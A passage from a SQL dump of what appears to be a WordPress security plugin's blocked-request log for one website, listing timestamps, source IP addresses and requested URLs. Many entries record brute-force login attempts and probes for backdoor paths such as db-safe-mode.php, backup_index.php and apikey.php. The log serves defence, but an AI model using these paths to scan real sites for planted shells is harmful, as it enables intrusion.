21:03:52','45.55.52.204','https://www.smithandsmith.co.za/wp-content/mu-plugins/db-safe-mode.php','404shield',''),(6018,'2022-04-14 23:58:04','109.70.100.29','http://smithandsmith.co.za/contact/','httpbl',''),(6019,'2022-04-14 23:58:05','109.70.100.29','http://smithandsmith.co.za/','httpbl',''),(6020,'2022-04-14 23:58:06','194.32.107.171','http://smithandsmith.co.za/contact/','httpbl',''),(6021,'2022-04-14 23:58:07','194.32.107.171','http://smithandsmith.co.za/','httpbl',''),(6022,'2022-04-14 23:58:08','107.189.28.253','https://smithandsmith.co.za/contact/','httpbl',''),(6023,'2022-04-14 23:58:10','107.189.28.253','https://smithandsmith.co.za/','httpbl',''),(6024,'2022-04-14 23:58:11','107.189.28.253','https://smithandsmith.co.za/','httpbl',''),(6025,'2022-04-14 23:58:14','199.249.230.176','https://smithandsmith.co.za/','httpbl',''),(6026,'2022-04-15 01:55:01','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6027,'2022-04-16 03:38:42','20.108.2.121','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6028,'2022-04-16 03:38:56','20.108.2.121','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6029,'2022-04-16 03:39:08','20.108.2.121','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6030,'2022-04-16 04:06:01','185.247.226.98','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6031,'2022-04-16 04:06:03','185.247.226.98','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6032,'2022-04-16 04:06:03','185.247.226.98','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6033,'2022-04-16 05:03:21','141.136.0.129','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6034,'2022-04-16 05:03:23','141.136.0.129','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6035,'2022-04-16 05:03:23','141.136.0.129','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6036,'2022-04-16 05:16:29','77.77.150.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(6037,'2022-04-16 11:01:35','92.118.36.109','https://smithandsmith.co.za/wp-content/plugins/woo-product-table/readme.txt','404shield',''),(6038,'2022-04-16 14:32:24','165.232.144.5','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(6039,'2022-04-16 16:27:15','210.16.189.15','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(6040,'2022-04-17 01:39:57','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6041,'2022-04-17 06:18:18','207.244.255.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(6042,'2022-04-17 23:01:09','185.220.101.57','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6043,'2022-04-17 23:01:11','185.220.101.57','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6044,'2022-04-17 23:01:11','185.220.101.57','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6045,'2022-04-17 23:59:33','216.239.90.19','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6046,'2022-04-17 23:59:35','216.239.90.19','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6047,'2022-04-17 23:59:35','216.239.90.19','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6048,'2022-04-18 01:35:59','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6049,'2022-04-18 11:20:18','23.154.177.4','http://smithandsmith.co.za/contact/','httpbl',''),(6050,'2022-04-18 11:20:20','23.154.177.4','http://smithandsmith.co.za/','httpbl',''),(6051,'2022-04-18 19:55:46','198.71.224.86','https://smithandsmith.co.za/wp-login.php','404shield',''),(6052,'2022-04-19 07:24:57','45.153.160.135','http://smithandsmith.co.za/contact/','httpbl',''),(6053,'2022-04-19 07:25:00','185.220.101.49','http://smithandsmith.co.za/','httpbl',''),(6054,'2022-04-19 07:25:00','185.220.101.49','http://smithandsmith.co.za/','httpbl',''),(6055,'2022-04-19 07:25:01','185.220.101.49','http://smithandsmith.co.za/','httpbl',''),(6056,'2022-04-19 15:31:09','49.51.34.111','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6057,'2022-04-19 15:37:34','49.51.34.111','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6058,'2022-04-19 15:37:50','49.51.34.111','https://smithandsmith.co.za/wp-content/mu-plugins/db-safe-mode.php','404shield',''),(6059,'2022-04-19 19:35:21','62.28.184.124','https://smithandsmith.co.za/wp-login.php','404shield',''),(6060,'2022-04-20 00:54:38','20.108.2.121','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6061,'2022-04-20 00:54:59','20.108.2.121','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6062,'2022-04-20 00:55:08','20.108.2.121','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6063,'2022-04-20 01:48:11','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6064,'2022-04-20 07:14:27','34.134.138.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(6065,'2022-04-20 08:20:08','78.47.162.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(6066,'2022-04-20 08:49:39','23.88.51.81','https://smithandsmith.co.za/wp-login.php','404shield',''),(6067,'2022-04-20 09:56:18','103.10.105.156','https://smithandsmith.co.za/wp-login.php','404shield',''),(6068,'2022-04-20 12:20:10','185.220.101.2','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6069,'2022-04-20 12:20:11','185.220.101.2','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6070,'2022-04-20 12:20:12','185.220.101.2','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6071,'2022-04-20 13:20:37','109.70.100.29','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6072,'2022-04-20 13:20:38','109.70.100.29','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6073,'2022-04-20 13:20:39','109.70.100.29','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6074,'2022-04-20 16:03:42','103.211.218.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(6075,'2022-04-21 20:33:47','213.175.208.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(6076,'2022-04-22 01:55:49','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6077,'2022-04-22 02:49:03','194.31.98.85','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6078,'2022-04-22 08:00:15','185.83.214.69','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6079,'2022-04-22 08:00:16','185.83.214.69','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6080,'2022-04-22 08:00:17','185.83.214.69','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6081,'2022-04-22 09:00:17','185.220.100.246','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6082,'2022-04-22 09:00:20','185.220.100.246','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6083,'2022-04-22 09:00:21','185.220.100.246','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6084,'2022-04-22 15:35:18','23.129.64.147','https://www.smithandsmith.co.za/','httpbl',''),(6085,'2022-04-22 16:43:22','159.203.176.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(6086,'2022-04-22 18:09:47','109.70.100.81','http://smithandsmith.co.za/contact/','httpbl',''),(6087,'2022-04-22 18:09:48','109.70.100.81','http://smithandsmith.co.za/','httpbl',''),(6088,'2022-04-22 18:09:49','185.82.126.222','http://smithandsmith.co.za/contact/','httpbl',''),(6089,'2022-04-22 18:09:50','185.82.126.222','http://smithandsmith.co.za/','httpbl',''),(6090,'2022-04-22 18:09:51','51.195.45.190','http://smithandsmith.co.za/contact/','httpbl',''),(6091,'2022-04-22 18:09:52','51.195.45.190','http://smithandsmith.co.za/','httpbl',''),(6092,'2022-04-22 18:09:54','198.98.60.97','http://smithandsmith.co.za/contact/','httpbl',''),(6093,'2022-04-22 18:09:56','185.16.38.112','http://smithandsmith.co.za/','httpbl',''),(6094,'2022-04-22 18:09:56','185.16.38.112','http://smithandsmith.co.za/','httpbl',''),(6095,'2022-04-22 18:09:57','185.16.38.112','http://smithandsmith.co.za/','httpbl',''),(6096,'2022-04-22 18:29:33','185.220.100.254','http://smithandsmith.co.za/contact/','httpbl',''),(6097,'2022-04-22 18:29:36','185.220.100.254','http://smithandsmith.co.za/','httpbl',''),(6098,'2022-04-22 18:29:38','45.79.177.190','http://smithandsmith.co.za/contact/','httpbl',''),(6099,'2022-04-22 18:29:39','45.79.177.190','http://smithandsmith.co.za/','httpbl',''),(6100,'2022-04-22 18:29:53','185.220.101.42','http://smithandsmith.co.za/contact/','httpbl',''),(6101,'2022-04-22 18:29:54','185.220.101.42','http://smithandsmith.co.za/','httpbl',''),(6102,'2022-04-22 18:29:56','167.86.70.160','http://smithandsmith.co.za/contact/','httpbl',''),(6103,'2022-04-22 18:29:57','167.86.70.160','http://smithandsmith.co.za/','httpbl',''),(6104,'2022-04-22 18:29:58','167.86.70.160','http://smithandsmith.co.za/','httpbl',''),(6105,'2022-04-23 03:24:22','109.86.225.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(6106,'2022-04-23 09:46:03','143.244.166.16','https://smithandsmith.co.za/wp-login.php','404shield',''),(6107,'2022-04-23 14:51:04','109.70.100.22','http://smithandsmith.co.za/contact/','httpbl',''),(6108,'2022-04-23 14:51:06','109.70.100.22','http://smithandsmith.co.za/','httpbl',''),(6109,'2022-04-23 14:51:25','89.234.157.254','http://smithandsmith.co.za/contact/','httpbl',''),(6110,'2022-04-23 14:51:47','109.70.100.24','https://smithandsmith.co.za/','httpbl',''),(6111,'2022-04-23 14:51:59','109.70.100.24','https://smithandsmith.co.za/','httpbl',''),(6112,'2022-04-23 16:38:43','51.12.82.209','https://smithandsmith.co.za/wp-login.php','404shield',''),(6113,'2022-04-23 16:38:44','51.12.82.209','https://smithandsmith.co.za/wp-login.php','404shield',''),(6114,'2022-04-23 16:38:44','51.12.82.209','https://smithandsmith.co.za/wp-login.php','404shield',''),(6115,'2022-04-23 20:19:17','45.118.145.96','https://smithandsmith.co.za/wp-login.php','404shield',''),(6116,'2022-04-24 01:44:11','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6117,'2022-04-24 03:17:50','144.172.73.66','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6118,'2022-04-24 03:17:52','144.172.73.66','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6119,'2022-04-24 03:17:53','144.172.73.66','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6120,'2022-04-24 04:14:34','107.189.7.175','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6121,'2022-04-24 04:14:36','107.189.7.175','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6122,'2022-04-24 04:14:37','107.189.7.175','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6123,'2022-04-24 11:43:42','185.220.101.44','http://smithandsmith.co.za/contact/','httpbl',''),(6124,'2022-04-24 11:43:42','185.220.101.44','http://smithandsmith.co.za/','httpbl',''),(6125,'2022-04-24 11:43:43','185.220.100.240','http://smithandsmith.co.za/contact/','httpbl',''),(6126,'2022-04-24 11:43:44','185.220.100.240','http://smithandsmith.co.za/','httpbl',''),(6127,'2022-04-24 11:43:45','23.154.177.11','http://smithandsmith.co.za/contact/','httpbl',''),(6128,'2022-04-24 11:43:46','23.154.177.11','http://smithandsmith.co.za/','httpbl',''),(6129,'2022-04-24 11:43:55','80.67.167.81','http://smithandsmith.co.za/contact/','httpbl',''),(6130,'2022-04-24 11:43:55','80.67.167.81','http://smithandsmith.co.za/','httpbl',''),(6131,'2022-04-24 11:43:56','80.67.167.81','http://smithandsmith.co.za/','httpbl',''),(6132,'2022-04-24 18:50:55','46.101.95.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(6133,'2022-04-25 02:10:41','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6134,'2022-04-25 22:11:56','62.171.137.169','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6135,'2022-04-25 22:11:58','62.171.137.169','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6136,'2022-04-25 22:11:59','62.171.137.169','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6137,'2022-04-25 23:07:42','5.255.97.170','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6138,'2022-04-25 23:07:44','5.255.97.170','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6139,'2022-04-25 23:07:45','5.255.97.170','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6140,'2022-04-25 23:54:34','45.9.20.103','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=1','404shield',''),(6141,'2022-04-26 09:53:59','103.116.16.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(6142,'2022-04-26 15:32:41','128.199.215.194','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6143,'2022-04-26 17:35:50','66.113.228.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(6144,'2022-04-26 17:35:50','66.113.228.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(6145,'2022-04-26 17:35:50','66.113.228.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(6146,'2022-04-26 20:16:25','167.172.133.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(6147,'2022-04-27 01:37:33','31.210.20.170','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(6148,'2022-04-27 01:52:10','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6149,'2022-04-27 10:44:53','206.189.29.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(6150,'2022-04-27 12:57:02','27.254.171.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(6151,'2022-04-27 16:04:28','45.153.160.137','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6152,'2022-04-27 16:04:30','45.153.160.137','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6153,'2022-04-27 16:04:30','45.153.160.137','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6154,'2022-04-27 16:04:33','109.70.100.28','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6155,'2022-04-27 16:04:35','109.70.100.28','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6156,'2022-04-27 17:02:15','185.117.215.9','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6157,'2022-04-27 17:02:17','185.117.215.9','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6158,'2022-04-27 17:02:17','185.117.215.9','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6159,'2022-04-27 18:17:38','66.94.114.17','https://smithandsmith.co.za/wp-login.php','404shield',''),(6160,'2022-04-27 20:57:23','199.249.230.142','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6161,'2022-04-27 20:57:24','199.249.230.142','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6162,'2022-04-27 20:57:26','199.249.230.142','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6163,'2022-04-28 02:32:29','20.127.99.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(6164,'2022-04-28 02:32:29','20.127.99.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(6165,'2022-04-28 02:32:29','20.127.99.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(6166,'2022-04-28 16:43:55','20.89.96.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(6167,'2022-04-28 16:43:55','20.89.96.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(6168,'2022-04-28 16:43:55','20.89.96.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(6169,'2022-04-28 21:14:44','47.75.56.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(6170,'2022-04-29 01:23:55','138.197.15.33','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(6171,'2022-04-29 01:25:14','138.197.15.33','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(6172,'2022-04-29 01:26:45','138.197.15.33','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6173,'2022-04-29 02:21:13','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6174,'2022-04-29 02:22:39','94.102.56.10','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6175,'2022-04-29 02:22:40','94.102.56.10','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6176,'2022-04-29 02:22:41','94.102.56.10','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6177,'2022-04-29 02:22:43','185.220.100.245','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6178,'2022-04-29 02:22:44','185.220.100.245','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6179,'2022-04-29 09:12:16','107.189.13.172','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6180,'2022-04-29 09:12:18','107.189.13.172','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6181,'2022-04-29 09:12:18','107.189.13.172','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6182,'2022-04-29 09:12:21','5.2.69.50','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6183,'2022-04-29 09:12:22','5.2.69.50','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6184,'2022-04-29 10:10:16','185.220.101.75','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6185,'2022-04-29 10:10:18','185.220.101.75','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6186,'2022-04-29 10:10:18','185.220.101.75','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6187,'2022-04-29 11:56:37','45.153.160.140','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6188,'2022-04-29 11:56:38','45.153.160.140','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6189,'2022-04-29 11:56:38','45.153.160.140','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6190,'2022-04-29 11:56:40','185.100.87.202','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6191,'2022-04-29 11:56:41','185.100.87.202','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6192,'2022-04-29 15:43:17','144.91.75.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(6193,'2022-04-29 16:00:52','95.214.52.208','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6194,'2022-04-29 16:00:53','95.214.52.208','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6195,'2022-04-29 16:00:53','95.214.52.208','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6196,'2022-04-29 17:56:58','15.235.41.25','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6197,'2022-04-29 23:17:54','51.142.146.155','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(6198,'2022-04-30 22:28:18','185.220.100.245','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6199,'2022-04-30 22:28:20','185.220.100.245','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6200,'2022-04-30 22:28:21','185.220.100.245','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6201,'2022-04-30 22:28:26','185.220.100.240','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6202,'2022-04-30 22:28:27','185.220.100.240','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6203,'2022-04-30 22:28:29','185.220.100.240','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6204,'2022-05-01 03:01:02','45.153.160.140','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6205,'2022-05-01 03:01:03','45.153.160.140','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6206,'2022-05-01 03:01:04','45.153.160.140','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6207,'2022-05-01 03:59:32','195.176.3.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(6208,'2022-05-01 03:59:34','195.176.3.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(6209,'2022-05-01 03:59:35','195.176.3.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(6210,'2022-05-01 09:50:53','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6211,'2022-05-01 09:54:03','185.220.100.246','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6212,'2022-05-01 12:00:26','52.189.215.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(6213,'2022-05-01 19:29:02','109.70.100.35','http://smithandsmith.co.za/contact/','httpbl',''),(6214,'2022-05-01 19:29:03','109.70.100.35','http://smithandsmith.co.za/','httpbl',''),(6215,'2022-05-02 07:25:03','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6216,'2022-05-02 13:55:13','89.58.16.25','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6217,'2022-05-02 14:58:41','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6218,'2022-05-02 16:46:13','91.123.18.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(6219,'2022-05-02 20:06:47','46.38.247.22','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6220,'2022-05-02 20:06:49','46.38.247.22','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6221,'2022-05-02 20:06:49','46.38.247.22','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6222,'2022-05-02 21:09:49','23.184.48.148','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6223,'2022-05-02 21:09:51','23.184.48.148','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6224,'2022-05-02 21:09:51','23.184.48.148','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6225,'2022-05-03 12:22:59','54.37.160.136','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6226,'2022-05-03 16:38:42','54.39.29.64','http://smithandsmith.co.za/contact/','httpbl',''),(6227,'2022-05-03 17:39:45','47.91.87.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(6228,'2022-05-03 22:22:19','185.220.101.11','http://smithandsmith.co.za/contact/','httpbl',''),(6229,'2022-05-03 22:22:21','167.86.70.160','http://smithandsmith.co.za/','httpbl',''),(6230,'2022-05-03 22:22:23','198.96.155.3','http://smithandsmith.co.za/contact/','httpbl',''),(6231,'2022-05-03 22:22:24','198.96.155.3','http://smithandsmith.co.za/','httpbl',''),(6232,'2022-05-03 22:22:25','198.96.155.3','http://smithandsmith.co.za/contact/','httpbl',''),(6233,'2022-05-03 22:22:47','5.2.76.221','http://smithandsmith.co.za/contact/','httpbl',''),(6234,'2022-05-03 22:23:20','104.149.136.246','http://smithandsmith.co.za/','httpbl',''),(6235,'2022-05-03 22:23:53','104.244.72.123','http://smithandsmith.co.za/','httpbl',''),(6236,'2022-05-03 22:24:44','192.42.116.18','http://smithandsmith.co.za/','httpbl',''),(6237,'2022-05-04 03:39:49','128.31.0.13','http://smithandsmith.co.za/contact/','httpbl',''),(6238,'2022-05-04 03:39:51','128.31.0.13','http://smithandsmith.co.za/','httpbl',''),(6239,'2022-05-04 03:39:52','185.220.100.243','http://smithandsmith.co.za/contact/','httpbl',''),(6240,'2022-05-04 03:39:54','185.220.103.9','http://smithandsmith.co.za/','httpbl',''),(6241,'2022-05-04 03:39:55','185.220.101.5','http://smithandsmith.co.za/contact/','httpbl',''),(6242,'2022-05-04 03:39:56','185.220.101.5','http://smithandsmith.co.za/','httpbl',''),(6243,'2022-05-04 03:39:57','109.70.100.84','http://smithandsmith.co.za/contact/','httpbl',''),(6244,'2022-05-04 03:39:58','178.62.220.93','http://smithandsmith.co.za/','httpbl',''),(6245,'2022-05-04 03:40:00','178.62.220.93','http://smithandsmith.co.za/','httpbl',''),(6246,'2022-05-04 03:40:01','178.62.220.93','http://smithandsmith.co.za/','httpbl',''),(6247,'2022-05-04 14:02:09','85.195.206.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(6248,'2022-05-04 14:02:10','85.195.206.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(6249,'2022-05-04 14:02:11','85.195.206.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(6250,'2022-05-04 15:08:51','198.98.61.102','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6251,'2022-05-04 15:08:52','198.98.61.102','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6252,'2022-05-04 15:08:53','198.98.61.102','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6253,'2022-05-04 18:09:35','162.144.49.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(6254,'2022-05-05 17:25:50','82.145.33.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(6255,'2022-05-05 21:39:58','185.220.103.120','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6256,'2022-05-05 21:40:00','185.220.103.120','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6257,'2022-05-05 21:40:02','185.220.103.120','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6258,'2022-05-05 21:40:06','107.189.8.33','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6259,'2022-05-05 22:02:48','62.197.136.102','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6260,'2022-05-06 00:56:20','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6261,'2022-05-06 05:30:22','5.161.61.81','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6262,'2022-05-06 08:29:05','199.249.230.179','https://smithandsmith.co.za/wp-login.php','404shield',''),(6263,'2022-05-06 08:29:09','199.249.230.179','https://smithandsmith.co.za/wp-login.php','404shield',''),(6264,'2022-05-06 08:29:10','199.249.230.179','https://smithandsmith.co.za/wp-login.php','404shield',''),(6265,'2022-05-06 09:34:28','164.92.218.139','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6266,'2022-05-06 09:34:29','164.92.218.139','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6267,'2022-05-06 09:34:30','164.92.218.139','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6268,'2022-05-06 14:55:46','185.220.100.248','http://smithandsmith.co.za/contact/','httpbl',''),(6269,'2022-05-06 14:55:47','109.70.100.32','http://smithandsmith.co.za/','httpbl',''),(6270,'2022-05-06 14:55:52','46.232.251.191','http://smithandsmith.co.za/contact/','httpbl',''),(6271,'2022-05-06 19:00:47','45.153.160.130','http://smithandsmith.co.za/contact/','httpbl',''),(6272,'2022-05-06 19:00:48','45.153.160.130','http://smithandsmith.co.za/','httpbl',''),(6273,'2022-05-06 19:00:50','83.96.213.63','http://smithandsmith.co.za/contact/','httpbl',''),(6274,'2022-05-06 19:00:51','83.96.213.63','http://smithandsmith.co.za/','httpbl',''),(6275,'2022-05-06 19:00:52','185.220.101.75','http://smithandsmith.co.za/contact/','httpbl',''),(6276,'2022-05-06 19:00:53','185.220.101.75','http://smithandsmith.co.za/','httpbl',''),(6277,'2022-05-06 19:00:54','51.195.166.195','http://smithandsmith.co.za/contact/','httpbl',''),(6278,'2022-05-06 19:00:55','51.195.166.195','http://smithandsmith.co.za/','httpbl',''),(6279,'2022-05-06 19:00:56','51.195.166.195','http://smithandsmith.co.za/','httpbl',''),(6280,'2022-05-07 08:16:15','107.189.2.91','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6281,'2022-05-07 11:09:28','185.243.218.78','https://smithandsmith.co.za/contact/','httpbl',''),(6282,'2022-05-07 11:09:31','185.243.218.78','https://smithandsmith.co.za/','httpbl',''),(6283,'2022-05-07 11:09:33','185.220.100.245','https://smithandsmith.co.za/','httpbl',''),(6284,'2022-05-07 11:09:35','185.220.100.245','https://smithandsmith.co.za/','httpbl',''),(6285,'2022-05-07 15:59:10','45.119.213.225','https://smithandsmith.co.za/wp-login.php','404shield',''),(6286,'2022-05-07 18:13:21','109.70.100.29','http://smithandsmith.co.za/contact/','httpbl',''),(6287,'2022-05-07 18:13:22','109.70.100.29','http://smithandsmith.co.za/','httpbl',''),(6288,'2022-05-07 18:13:23','162.247.74.213','http://smithandsmith.co.za/contact/','httpbl',''),(6289,'2022-05-07 18:13:25','162.247.74.213','http://smithandsmith.co.za/','httpbl',''),(6290,'2022-05-07 18:13:26','194.26.192.187','http://smithandsmith.co.za/contact/','httpbl',''),(6291,'2022-05-07 18:13:26','185.233.100.23','http://smithandsmith.co.za/','httpbl',''),(6292,'2022-05-07 18:13:27','185.220.101.63','http://smithandsmith.co.za/contact/','httpbl',''),(6293,'2022-05-07 18:13:28','185.220.101.63','http://smithandsmith.co.za/','httpbl',''),(6294,'2022-05-07 18:13:31','185.220.101.63','http://smithandsmith.co.za/','httpbl',''),(6295,'2022-05-08 03:02:35','208.109.36.200','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6296,'2022-05-08 04:26:27','185.220.101.69','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6297,'2022-05-08 04:26:30','185.220.101.69','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6298,'2022-05-08 04:26:31','185.220.101.69','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6299,'2022-05-08 05:35:59','109.70.100.92','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6300,'2022-05-08 05:36:01','109.70.100.92','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6301,'2022-05-08 05:36:02','109.70.100.92','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6302,'2022-05-08 06:40:34','185.220.101.39','http://smithandsmith.co.za/contact/','httpbl',''),(6303,'2022-05-08 06:40:35','185.220.101.39','http://smithandsmith.co.za/','httpbl',''),(6304,'2022-05-08 06:40:36','93.174.89.131','http://smithandsmith.co.za/contact/','httpbl',''),(6305,'2022-05-08 06:40:37','93.174.89.131','http://smithandsmith.co.za/','httpbl',''),(6306,'2022-05-08 